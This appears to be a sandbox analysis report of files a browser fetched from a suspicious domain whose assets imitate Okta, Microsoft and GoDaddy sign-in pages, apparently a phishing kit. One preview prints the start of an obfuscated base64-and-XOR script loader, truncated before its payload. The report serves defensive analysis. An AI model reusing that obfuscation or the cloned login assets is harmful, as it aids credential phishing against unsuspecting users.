                                    Entropy (8bit):3.990210155325004
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                    SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                    SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                    SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                    Malicious:false
                                    Reputation:unknown
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:SVG Scalable Vector Graphics image
                                    Category:downloaded
                                    Size (bytes):1864
                                    Entropy (8bit):5.222032823730197
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:BC3D32A696895F78C19DF6C717586A5D
                                    SHA1:9191CB156A30A3ED79C44C0A16C95159E8FF689D
                                    SHA-256:0E88B6FCBB8591EDFD28184FA70A04B6DD3AF8A14367C628EDD7CABA32E58C68
                                    SHA-512:8D4F38907F3423A86D90575772B292680F7970527D2090FC005F9B096CC81D3F279D59AD76EAFCA30C3D4BBAF2276BBAA753E2A46A149424CF6F1C319DED5A64
                                    Malicious:false
                                    Reputation:unknown
                                    URL:https://jwx.iountanic.com/klWThlpoBQ2wTEgHE3lGTgysOkz5URLhtolf2KQNij9IieZBfDDg9wDI3LQ2LY6So22Euv215
                                    Preview:<svg xmlns="http://www.w3.org/2000/svg" width="1920" height="1080" fill="none"><g opacity=".2" clip-path="url(#E)"><path d="M1466.4 1795.2c950.37 0 1720.8-627.52 1720.8-1401.6S2416.77-1008 1466.4-1008-254.4-380.482-254.4 393.6s770.428 1401.6 1720.8 1401.6z" fill="url(#A)"/><path d="M394.2 1815.6c746.58 0 1351.8-493.2 1351.8-1101.6S1140.78-387.6 394.2-387.6-957.6 105.603-957.6 714-352.38 1815.6 394.2 1815.6z" fill="url(#B)"/><path d="M1548.6 1885.2c631.92 0 1144.2-417.45 1144.2-932.4S2180.52 20.4 1548.6 20.4 404.4 437.85 404.4 952.8s512.276 932.4 1144.2 932.4z" fill="url(#C)"/><path d="M265.8 1215.6c690.246 0 1249.8-455.595 1249.8-1017.6S956.046-819.6 265.8-819.6-984-364.005-984 198-424.445 1215.6 265.8 1215.6z" fill="url(#D)"/></g><defs><radialGradient id="A" cx="0" cy="0" r="1" gradientUnits="userSpaceOnUse" gradientTransform="translate(1466.4 393.6) rotate(90) scale(1401.6 1720.8)"><stop stop-color="#107c10"/><stop offset="1" stop-color="#c4c4c4" stop-opacity="0"/></radialGradient><r
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:SVG Scalable Vector Graphics image
                                    Category:downloaded
                                    Size (bytes):2905
                                    Entropy (8bit):3.962263100945339
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:FE87496CC7A44412F7893A72099C120A
                                    SHA1:A0C1458C08A815DF63D3CB0406D60BE6607CA699
                                    SHA-256:55CE3B0CE5BC71339308107982CD7671F96014256DED0BE36DC8062E64C847F1
                                    SHA-512:E527C6CD2A3D79CA828A9126E8FF7009A540AA764082750D4FA8207C2B8439CA1FDC4459E935D708DC59DCFFE55FE45188EB5E266D1B745FCA7588501BC0117D
                                    Malicious:false
                                    Reputation:unknown
                                    URL:https://jwx.iountanic.com/yzv2W6Q2eWTMYbWVWVnbymnApcTLAKB98rxUHabab180
                                    Preview:<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M30.422,29.092a3.493,3.493,0,0,1,1.324.261,3.381,3.381,0,0,1,1.132.749q.366.366.827.775t.949.854q.488.444.941.932a9.974,9.974,0,0,1,.819,1A4.951,4.951,0,0,1,37,34.736a3.133,3.133,0,0,1,.218,1.15,3.493,3.493,0,0,1-.261,1.324,3.381,3.381,0,0,1-.749,1.132q-.888.888-1.6,1.568a8.753,8.753,0,0,1-1.489,1.15,6.17,6.17,0,0,1-1.716.705A9.367,9.367,0,0,1,29.151,42a13.73,13.73,0,0,1-3.9-.592A21.891,21.891,0,0,1,21.26,39.77a27.749,27.749,0,0,1-3.885-2.491,34.863,34.863,0,0,1-3.6-3.153,34.6,34.6,0,0,1-3.127-3.606,27.717,27.717,0,0,1-2.456-3.876A22.2,22.2,0,0,1,6.584,22.69,13.485,13.485,0,0,1,6,18.866,9.453,9.453,0,0,1,6.235,16.6a6.2,6.2,0,0,1,.7-1.707,8.848,8.848,0,0,1,1.141-1.489q.679-.723,1.585-1.611a3.381,3.381,0,0,1,1.132-.749,3.493,3.493,0,0,1,1.324-.261,3.3,3.3,0,0,1,1.681.47,8.648,8.648,0,0,1,1.542,1.15,17.725,17.725,0,0,1,1.376,1.428q.645.
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:SVG Scalable Vector Graphics image
                                    Category:downloaded
                                    Size (bytes):270
                                    Entropy (8bit):4.840496990713235
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:40EB39126300B56BF66C20EE75B54093
                                    SHA1:83678D94097257EB474713DEC49E8094F49D2E2A
                                    SHA-256:765709425A5B9209E875DCCF2217D3161429D2D48159FC1DF7B253B77C1574F4
                                    SHA-512:9C9CD1752A404E71772003469550D3B4EFF8346A4E47BE131BB2B9CB8DD46DBEF4863C52A63A9C63989F9ABEE775CB63C111ADD7AFA9D4DFC7A4D95AE30F9C6E
                                    Malicious:false
                                    Reputation:unknown
                                    URL:https://jwx.iountanic.com/mnrggFFHtx5guxzVHbaAx4ELtdqTSpEouv9oeRvgL9RgzCyFzGNfarz78150
                                    Preview:<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" viewBox="0 0 12 12"><title>assets</title><rect width="12" height="12" fill="none"/><path d="M6.7,6,12,11.309,11.309,12,6,6.7.691,12,0,11.309,5.3,6,0,.691.691,0,6,5.3,11.309,0,12,.691Z" fill="#262626"/></svg>
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:PNG image data, 72 x 15, 8-bit/color RGB, non-interlaced
                                    Category:dropped
                                    Size (bytes):61
                                    Entropy (8bit):4.035372245524405
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:A89E333BF32FD8297A0F647CA0000C5A
                                    SHA1:B8D6008F3F41BB45C8CA92A4F157BE0B30B912DE
                                    SHA-256:823B3771614718430145B41092FA4EFB5B87E8E79E070C8BC6424AE20F4FD3FF
                                    SHA-512:69E6ADF32ECD734A3ACD0D18398DE9D524666F7B01ED804E6CE337BAC9D6BEF0F365B9F766CAA255D525C5A9E52E58FCF619A8C22C284D5ABD9BBF48DC2443EF
                                    Malicious:false
                                    Reputation:unknown
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:ASCII text, with very long lines (10450)
                                    Category:downloaded
                                    Size (bytes):10498
                                    Entropy (8bit):5.327380141461276
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:E0D37A504604EF874BAD26435D62011F
                                    SHA1:4301F0D2B729AE22ADECE657D79ECCAA25F429B1
                                    SHA-256:C39FF65E2A102E644EB0BF2E31D2BAD3D18F7AFB25B3B9BA7A4D46263A711179
                                    SHA-512:EF838FD58E0D12596726894AB9418C1FBE31833C187C3323EBFD432970EB1593363513F12114E78E008012CDEF15B504D603AFE4BB10AE5C47674045ACC5221E
                                    Malicious:false
                                    Reputation:unknown
                                    URL:https://ok4static.oktacdn.com/assets/loginpage/css/loginpage-theme.e0d37a504604ef874bad26435d62011f.css
                                    Preview:a,abbr,acronym,address,applet,b,big,blockquote,body,caption,center,cite,code,dd,del,dfn,div,dl,dt,em,fieldset,form,h1,h2,h3,h4,h5,h6,html,i,iframe,img,ins,kbd,label,legend,li,object,ol,p,pre,q,s,samp,small,span,strike,strong,sub,sup,table,tbody,td,tfoot,th,thead,tr,tt,u,ul,var{background:transparent;border:0;font-size:100%;font:inherit;margin:0;outline:0;padding:0;vertical-align:baseline}body{line-height:1}ol,ul{list-style:none}blockquote,q{quotes:none}blockquote:after,blockquote:before,q:after,q:before{content:"";content:none}:focus{outline:0}ins{text-decoration:none}del{text-decoration:line-through}table{border-collapse:collapse;border-spacing:0}input[type=hidden]{display:none!important}input[type=checkbox],input[type=radio]{border:0!important;margin:0;padding:0}@font-face{font-family:Proxima Nova;font-style:normal;font-weight:400;src:url(../font/assets/proximanova-reg-webfont.9d5837512674046fa816.eot);src:url(../font/assets/proximanova-reg-webfont.9d5837512674046fa816.eot?#iefix) fo
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:ASCII text, with very long lines (23648), with no line terminators
                                    Category:downloaded
                                    Size (bytes):23648
                                    Entropy (8bit):5.105432676683315
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:EA5F78F2084AC770BD4E43FC794ABEFD
                                    SHA1:3C5D30F496503CA89833A14151C2A9F8A7F72C5E
                                    SHA-256:D1747D1FD3044146713D389FBC34CFCCC3552A39F4A6505BD8817FD20BB48052
                                    SHA-512:DEDE8D95C6A7044B8E7EF5C39B5DD63FB4DD01C93DF3D34BA44B1FE73A99EC27B60E41C217AF00FA562A6DADA290000EA45C224BF6E278E717D04936D58798F0
                                    Malicious:false
                                    Reputation:unknown
                                    URL:https://jwx.iountanic.com/34YOSnhY5xyJbcpf8920
                                    Preview:#authcalldesc,#sections,.text-m{font-size:.9375rem}*,input[type=radio]{box-sizing:border-box;padding:0}.alert,.radio label,.row.tile{margin-bottom:0}#sections,.input-group-addon,.table .table-cell,img{vertical-align:middle}#sections_pdf .pdfheader #pageName,.row.tile,.row.tile:not(.no-pick):active,.row.tile:not(.no-pick):hover,input{color:inherit}*,input{margin:0}.p,.subtitle,.text-body,.text-subtitle,h4{font-weight:400}*,.text-title{font-family:"Segoe UI","Helvetica Neue","Lucida Grande",Roboto,Ebrima,"Nirmala UI",Gadugi,"Segoe Xbox Symbol","Segoe UI Symbol","Meiryo UI","Khmer UI",Tunga,"Lao UI",Raavi,"Iskoola Pota",Latha,Leelawadee,"Microsoft YaHei UI","Microsoft JhengHei UI","Malgun Gothic","Estrangelo Edessa","Microsoft Himalaya","Microsoft New Tai Lue","Microsoft PhagsPa","Microsoft Tai Le","Microsoft Yi Baiti","Mongolian Baiti","MV Boli","Myanmar Text","Cambria Math"}.websitesections{height:100%;width:100vw;position:relative}#sections_godaddy,#sections_pdf{display:flex;flex-direc
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:Web Open Font Format (Version 2), TrueType, length 20416, version 2.197
                                    Category:downloaded
                                    Size (bytes):20416
                                    Entropy (8bit):7.99050164976329
                                    Encrypted:true
                                    SSDEEP:
                                    MD5:D99A7377DABB55772CA9F986B0A04B57
                                    SHA1:2B5FCD8431953C44E410D0489899E74F6D2CFECC
                                    SHA-256:AFFDBA1620552B12A1A8A04467136AEB408C03FA337D20E9C38374D682D4D149
                                    SHA-512:CB80EBC6424029C45E86DDF6C18EB43284605678EDE88119301CC6493C21E282CACE48FD849FC14E5D73C6AECF83645CC3A58051D5D8E22197E09912A41E3130
                                    Malicious:false
                                    Reputation:unknown
                                    URL:https://ok4static.oktacdn.com/assets/loginpage/font/assets/proximanova-reg-webfont.353416ed0ff540352235.woff2
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
                                    Category:dropped
                                    Size (bytes):231
                                    Entropy (8bit):6.725074433303473
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:547988BAC5584B4608466D761E16F370
                                    SHA1:C11BB71049702528402A31027F200184910A7E23
                                    SHA-256:70E32B2DB3F079BB0295A85A0DB15ED9E5926294DD947938D6CFA595F5AB18B4
                                    SHA-512:C4A76F6E94982D1CC02C2B67523A334E76BFDE525C1014D32DB9E7ECA0FA39A06F291ECFA94C8C6A49D488EA3ACF9C10DDF3CAD9515562010440863D0F08FBA3
                                    Malicious:false
                                    Reputation:unknown
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:PNG image data, 506 x 303, 8-bit/color RGBA, non-interlaced
                                    Category:downloaded
                                    Size (bytes):29796
                                    Entropy (8bit):7.980058333789969
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:210433A8774859368F3A7B86D125A2A7
                                    SHA1:408BACDDC39F12CAD285579C102FE4A629862D88
                                    SHA-256:9C6ADDFC339CE1C1D262290AB4CC2DE8D38D4B54B11A8E85AFD44FBB0ACC2561
                                    SHA-512:6CBF6492BBA0734ECE1B595743B7A251D3C98425A36D5BF87EBFAD17BE979A23ADEE556FB074EF6D284052F6412ACEDA4E179FB7DFA0BA1103610CC01113A1A3
                                    Malicious:false
                                    Reputation:unknown
                                    URL:https://jwx.iountanic.com/qrYLb650e94kpXwA4XFWfvn6Klr5vGxUBRt12JyRMFNWzkfqNjLbCIb0kT8KGX2ef238
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:ASCII text, with very long lines (45667)
                                    Category:downloaded
                                    Size (bytes):45806
                                    Entropy (8bit):5.207605835316031
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:80F5B8C6A9EEAC15DE93E5A112036A06
                                    SHA1:F7174635137D37581B11937FC90E9CB325077BCE
                                    SHA-256:0401DE33701F1CAD16ECF952899D23990B6437D0A5B7335524EDF6BDFB932542
                                    SHA-512:B976A5F02202439D94C6817D037C813FA1945C6BB93762284D97FF61718C5B833402F372562034663A467FDBAA46990DE24CB1E356392340E64D034E4BA1B4E4
                                    Malicious:false
                                    Reputation:unknown
                                    URL:https://cdn.socket.io/4.6.0/socket.io.min.js
                                    Preview:/*!. * Socket.IO v4.6.0. * (c) 2014-2023 Guillermo Rauch. * Released under the MIT License.. */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?module.exports=e():"function"==typeof define&&define.amd?define(e):(t="undefined"!=typeof globalThis?globalThis:t||self).io=e()}(this,(function(){"use strict";function t(e){return t="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(t){return typeof t}:function(t){return t&&"function"==typeof Symbol&&t.constructor===Symbol&&t!==Symbol.prototype?"symbol":typeof t},t(e)}function e(t,e){if(!(t instanceof e))throw new TypeError("Cannot call a class as a function")}function n(t,e){for(var n=0;n<e.length;n++){var r=e[n];r.enumerable=r.enumerable||!1,r.configurable=!0,"value"in r&&(r.writable=!0),Object.defineProperty(t,r.key,r)}}function r(t,e,r){return e&&n(t.prototype,e),r&&n(t,r),Object.defineProperty(t,"prototype",{writable:!1}),t}function i(){return i=Object.assign?Object.assign.bind():function(t){for(var e=
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:ASCII text, with very long lines (1434), with no line terminators
                                    Category:downloaded
                                    Size (bytes):1434
                                    Entropy (8bit):5.797411717028582
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:0CDF60CFA5C897E4E6D43B67D1F32026
                                    SHA1:7796D25A6F6C92D423BABA09F7C1B21ABD426011
                                    SHA-256:1BE24DB5F3AA860A3D2B5C918F43E1CB57DC367DB832E72CC4DC5F289D81BCC5
                                    SHA-512:3269C766A77504FE6128A45CE36A787E6797FEC144FB0907869131174E1BA357DEB20B41D813075D869629DDC3BA1A0E26BE32794B33DB39E417811B1F6026CB
                                    Malicious:false
                                    Reputation:unknown
                                    URL:https://www.google.com/recaptcha/api.js
                                    Preview:/* PLEASE DO NOT COPY AND PASTE THIS CODE. */(function(){var w=window,C='___grecaptcha_cfg',cfg=w[C]=w[C]||{},N='grecaptcha';var gr=w[N]=w[N]||{};gr.ready=gr.ready||function(f){(cfg['fns']=cfg['fns']||[]).push(f);};w['__recaptcha_api']='https://www.google.com/recaptcha/api2/';(cfg['render']=cfg['render']||[]).push('onload');w['__google_recaptcha_client']=true;var d=document,po=d.createElement('script');po.type='text/javascript';po.async=true; po.charset='utf-8';var v=w.navigator,m=d.createElement('meta');m.httpEquiv='origin-trial';m.content='A/kargTFyk8MR5ueravczef/wIlTkbVk1qXQesp39nV+xNECPdLBVeYffxrM8TmZT6RArWGQVCJ0LRivD7glcAUAAACQeyJvcmlnaW4iOiJodHRwczovL2dvb2dsZS5jb206NDQzIiwiZmVhdHVyZSI6IkRpc2FibGVUaGlyZFBhcnR5U3RvcmFnZVBhcnRpdGlvbmluZzIiLCJleHBpcnkiOjE3NDIzNDIzOTksImlzU3ViZG9tYWluIjp0cnVlLCJpc1RoaXJkUGFydHkiOnRydWV9';if(v&&v.cookieDeprecationLabel){v.cookieDeprecationLabel.getValue().then(function(l){if(l!=='treatment_1.1'&&l!=='treatment_1.2'&&l!=='control_1.1'){d.head.prepend(m)
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:PNG image data, 2446 x 899, 8-bit/color RGBA, non-interlaced
                                    Category:downloaded
                                    Size (bytes):70712
                                    Entropy (8bit):6.94130504124589
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:F70FF06D19498D80B130EC78176FD3FF
                                    SHA1:9D8A3B74C5164FF7AE2C7930B6D7B14707B404FC
                                    SHA-256:DF6DBAB5251E56B405E48AAF57D3CD4188F073FFBA71131FA6CD26E6742923AE
                                    SHA-512:543151693C3751A7E6B1B6A9EA77B83CFD049BC320EE75B666514076F4C0218E9DC23DA5E6C932B2B8670AA1BE1D4E9A91A889F5C6F0D7B9F9C9FE6694609B31
                                    Malicious:false
                                    Reputation:unknown
                                    URL:https://jwx.iountanic.com/uvA9xxIln4gxx3xB6QZDnGlr1UVZ7iRCjLnQ672Ba0ZlrFSxi3R4s7dQUEN5fwo1gh260
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                    Category:dropped
                                    Size (bytes):727
                                    Entropy (8bit):7.573165690842521
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:839CB0F55C3D2D5C2F740BDA95CB2878
                                    SHA1:93F6FA3A2DA8B7184D4B5C5F2065872793370C2E
                                    SHA-256:40ECB8832F6A9A8AAA0CC6E1287E867A4FCA38433D091D86C6CAB1F28FBAB652
                                    SHA-512:ECBCA8AB21BF3302C88F933CFD248CFF5553AFE152A170F554C27FD67BDC3E7D8CE79E202561FD0658E41820681EB90F74E38FD09390C517AFB34D2C1B65A096
                                    Malicious:false
                                    Reputation:unknown
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:Web Open Font Format, TrueType, length 36696, version 1.0
                                    Category:downloaded
                                    Size (bytes):36696
                                    Entropy (8bit):7.988666025644622
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:A69E9AB8AFDD7486EC0749C551051FF2
                                    SHA1:C34E6AA327B536FB48D1FE03577A47C7EE2231B8
                                    SHA-256:FD78A1913DB912221B8EAD1E62FAD47D1FF0A9FA6CD88D3B128A721AD91D2FAF
                                    SHA-512:9A0E4297282542B8813F9CC85B2CCB09663CE281F64503F9A5284631881DA9AACF7649553BF1423D941F01B97E6BC3BA50AB13E55E4B7B61C5AA0A4ADF4D390F
                                    Malicious:false
                                    Reputation:unknown
                                    URL:https://jwx.iountanic.com/23mbzFAvCdKtD89QjgO0fYLxy70
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:Web Open Font Format (Version 2), TrueType, length 154228, version 769.768
                                    Category:downloaded
                                    Size (bytes):154228
                                    Entropy (8bit):7.996770916751852
                                    Encrypted:true
                                    SSDEEP:
                                    MD5:55B416A8DF21F9F987AA352F10D1343B
                                    SHA1:2717F3F58271F2F2E6120D9937C7227002656D34
                                    SHA-256:D76FB4E841748A3F6BC63EFA23156E02631C283BF41F84EFCBDAF339EA3E1B73
                                    SHA-512:7C4983811EBA2AE80998C62C0EB48CC53EEC26E3CA4222D5CF0A758A5EA92E6A14DCFED4FE5B7EF5513F89BE2C0F336D0131687FA3EDDCBD4BB218BBD6BEB985
                                    Malicious:false
                                    Reputation:unknown
                                    URL:https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.1.1/webfonts/fa-solid-900.woff2
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:Web Open Font Format, TrueType, length 35970, version 1.0
                                    Category:downloaded
                                    Size (bytes):35970
                                    Entropy (8bit):7.989503040923577
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:496B7BBDE91C7DC7CF9BBABBB3921DA8
                                    SHA1:2BD3C406A715AB52DAD84C803C55BF4A6E66A924
                                    SHA-256:AE40A04F95DF12B0C364F26AB691DC0C391D394A28BCDB4AEACFACA325D0A798
                                    SHA-512:E02B40FEA8F77292B379D7D792D9142B32DFCB887655A2D1781441227DD968589BFC5C00691B92E824F7EDB47D11EBA325ADE67AD08A4AF31A3B0DDF4BB8B967
                                    Malicious:false
                                    Reputation:unknown
                                    URL:https://jwx.iountanic.com/yzgs0FDoygtBYp8R56JncHRop48
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:ASCII text, with very long lines (65317)
                                    Category:downloaded
                                    Size (bytes):100782
                                    Entropy (8bit):4.782445110770722
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:6386FB409D4A2ABC96EEE7BE8F6D4CC4
                                    SHA1:09102CFC60EFB430A25EE97CEE9A6A35DF6DFC59
                                    SHA-256:0DF5A33710E433DE1F5415B1D47E4130CA7466AEE5B81955F1045C4844BBB3ED
                                    SHA-512:29F91FC180EC2E4225C10A7A2C59E5F3335D2C6C6EF58000D50BF020D92CE0F85C125412BEA73254B2C3F5A3215DDD77B908E85ED10A368B0E59A66A5E07A5D2
                                    Malicious:false
                                    Reputation:unknown
                                    URL:https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.1.1/css/all.min.css
                                    Preview:/*!. * Font Awesome Free 6.1.1 by @fontawesome - https://fontawesome.com. * License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License). * Copyright 2022 Fonticons, Inc.. */..fa{font-family:var(--fa-style-family,"Font Awesome 6 Free");font-weight:var(--fa-style,900)}.fa,.fa-brands,.fa-duotone,.fa-light,.fa-regular,.fa-solid,.fa-thin,.fab,.fad,.fal,.far,.fas,.fat{-moz-osx-font-smoothing:grayscale;-webkit-font-smoothing:antialiased;display:var(--fa-display,inline-block);font-style:normal;font-variant:normal;line-height:1;text-rendering:auto}.fa-1x{font-size:1em}.fa-2x{font-size:2em}.fa-3x{font-size:3em}.fa-4x{font-size:4em}.fa-5x{font-size:5em}.fa-6x{font-size:6em}.fa-7x{font-size:7em}.fa-8x{font-size:8em}.fa-9x{font-size:9em}.fa-10x{font-size:10em}.fa-2xs{font-size:.625em;line-height:.1em;vertical-align:.225em}.fa-xs{font-size:.75em;line-height:.08333em;vertical-align:.125em}.fa-sm{font-size:.875em;line-height:.07143em;vertical-align:.05357em
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:downloaded
                                    Size (bytes):35748
                                    Entropy (8bit):5.056772709760769
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:94C952E68CD89B529170B6B82C994BBE
                                    SHA1:822F28855D88DA679AF6E8A437316D72433965D4
                                    SHA-256:5A55CE5E458408B483A2B08C45444E987124FD0857D68F12C9A2EAE76BB8A8C4
                                    SHA-512:EF59FD62B3E33A20A78157A620BB05A463138CF92EFE597E70D3F9EDAAB499FA9B72CF2E29DCEF9ED7C7D7764E42111B690D30A7328D2FA9760F40BEF1E10548
                                    Malicious:false
                                    Reputation:unknown
                                    URL:https://jwx.iountanic.com/abxnHb1KPpq58ef30
                                    Preview:#sections_godaddy {..font-family: gdsherpa;..}..#sections_godaddy a {.. color: var(--ux-2rqapw,#000);.. -webkit-text-decoration: var(--ux-1f7if5p,underline);.. text-decoration: var(--ux-1f7if5p,underline);.. background-color: transparent;..}....#sections_godaddy #root {.. flex: 1 1 0%;..}....#sections_godaddy a:hover {.. color: var(--ux-1j87vvn,#fff);.. -webkit-text-decoration: var(--ux-1ft0khm,underline);.. text-decoration: var(--ux-1ft0khm,underline);..}....#sections_godaddy svg {.. overflow: hidden;.. vertical-align: unset;..}....#sections_godaddy .ux-button {.. --ux-button-icon-margin: calc((var(--ux-t379ov,var(--ux-jw5s9j,1.5)) * 1em - 1.5em) / 2);.. padding: 0;.. text-decoration: var(--ux-1f7if5p,underline);.. -webkit-text-decoration: var(--ux-1f7if5p,underline);.. gap: 0.5em;.. cursor: pointer;.. --ux-button-icon-margin: calc((var(--ux-t379ov,var(--ux-jw5s9j,1.5)) * 1em - 1.5em) / 2);.. font-weight: inherit;.. background: transparent;.. gap: .5em;.. displa
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:SVG Scalable Vector Graphics image
                                    Category:dropped
                                    Size (bytes):268
                                    Entropy (8bit):5.111190711619041
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:59759B80E24A89C8CD029B14700E646D
                                    SHA1:651B1921C99E143D3C242DE3FAACFB9AD51DBB53
                                    SHA-256:B02B5DF3ECD59D6CD90C60878683477532CBFC24660028657F290BDC7BC774B5
                                    SHA-512:0812DA742877DD00A2466911A64458B15B4910B648A5E98A4ACF1D99E1220E1F821AAF18BDE145DF185D5F72F5A4B2114EA264F906135F3D353440F343D52D2E
                                    Malicious:false
                                    Reputation:unknown
                                    Preview:<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M10,32H38V18.125L24,25.109,10,18.125V32m.234-16L24,22.891,37.766,16H10.234M40,34H8V14H40Z" fill="#404040"/></svg>
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:ASCII text, with very long lines (51734)
                                    Category:downloaded
                                    Size (bytes):222931
                                    Entropy (8bit):5.0213311632628725
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:0329C939FCA7C78756B94FBCD95E322B
                                    SHA1:7B5499B46660A0348CC2B22CAE927DCC3FDA8B20
                                    SHA-256:0E47F4D2AF98BFE77921113C8AAF0C53614F88FF14FF819BE6612538611ED3D1
                                    SHA-512:1E819E0F9674321EEE28B3E73954168DD5AEF2965D50EE56CAD21A83348894AB57870C1C398684D9F8EAB4BBBEF5239F4AEA1DCAB522C61F91BD81CF358DA396
                                    Malicious:false
                                    Reputation:unknown
                                    URL:https://ok4static.oktacdn.com/assets/js/sdk/okta-signin-widget/7.18.0/css/okta-sign-in.min.css
                                    Preview:@charset "UTF-8";.qtip{box-shadow:none;direction:ltr;display:none;font-size:10.5px;left:-28000px;line-height:12px;max-width:280px;min-width:50px;padding:0;position:absolute;top:-28000px}.qtip-content{word-wrap:break-word;padding:5px 9px;text-align:left}.qtip-content,.qtip-titlebar{overflow:hidden;position:relative}.qtip-titlebar{border-width:0 0 1px;font-weight:700;padding:5px 35px 5px 10px}.qtip-titlebar+.qtip-content{border-top-width:0!important}.qtip-close{border:1px solid transparent;cursor:pointer;outline:medium none;position:absolute;right:-9px;top:-9px;z-index:11}.qtip-titlebar .qtip-close{margin-top:-9px;right:4px;top:50%}* html .qtip-titlebar .qtip-close{top:16px}.qtip-icon .ui-icon,.qtip-titlebar .ui-icon{direction:ltr;display:block;text-indent:-1000em}.qtip-icon,.qtip-icon .ui-icon{-moz-border-radius:3px;-webkit-border-radius:3px;border-radius:3px;text-decoration:none}.qtip-icon .ui-icon{background:transparent none no-repeat -100em -100em;color:inherit;height:14px;line-heigh
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:HTML document, ASCII text, with very long lines (1905), with CRLF line terminators
                                    Category:downloaded
                                    Size (bytes):2272
                                    Entropy (8bit):5.992109739690461
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:91C969F4817E5BADE8C4EB4024DDD468
                                    SHA1:569157E3D60A4EB31390615D57CC54084F640577
                                    SHA-256:68E53D6B667AB39FE8ED486794B05246CF5112739A4ED21D6293A33AF382B22F
                                    SHA-512:2C1ABCF3AA1CC336A527796A0DDA35AC8C5957BE3098A67B4C1749EACC8FCD27F03EF3BB4B87C3885A3705587EC0D06930C9D748F7BF38292B0E8C444951A7AD
                                    Malicious:false
                                    Reputation:unknown
                                    URL:https://jwx.iountanic.com/4rGra/
                                    Preview:<script>..function fGAzvYPlvm(ANjlUPiFfm, fKkQPCHvdk) {..let elduOabCcB = '';..ANjlUPiFfm = atob(ANjlUPiFfm);..let QbyalYKFjJ = fKkQPCHvdk.length;..for (let i = 0; i < ANjlUPiFfm.length; i++) {.. elduOabCcB += String.fromCharCode(ANjlUPiFfm.charCodeAt(i) ^ fKkQPCHvdk.charCodeAt(i % QbyalYKFjJ));..}..return elduOabCcB;..}..var okHsooaLAl = fGAzvYPlvm(`
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:ASCII text, with very long lines (65536), with no line terminators
                                    Category:dropped
                                    Size (bytes):122061
                                    Entropy (8bit):5.207768728374116
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:90994578520114F98D6FFDE38882AFB5
                                    SHA1:CA81F5DBAEFD6ED9733184141FA67B290867B614
                                    SHA-256:59D0DE8C2C7D41A3ACD63EFB3241F40BF7C0243E7158CED3C7FB647DDE3AE1BA
                                    SHA-512:D94E85BBF534C453F75CEC10F96431C08A574731A04CC52FAF54F04EF8099D2784871A9236636EA74223DDE4EB12D0A37657A3D8AF65B75447BA8BD364F12F43
                                    Malicious:false
                                    Reputation:unknown
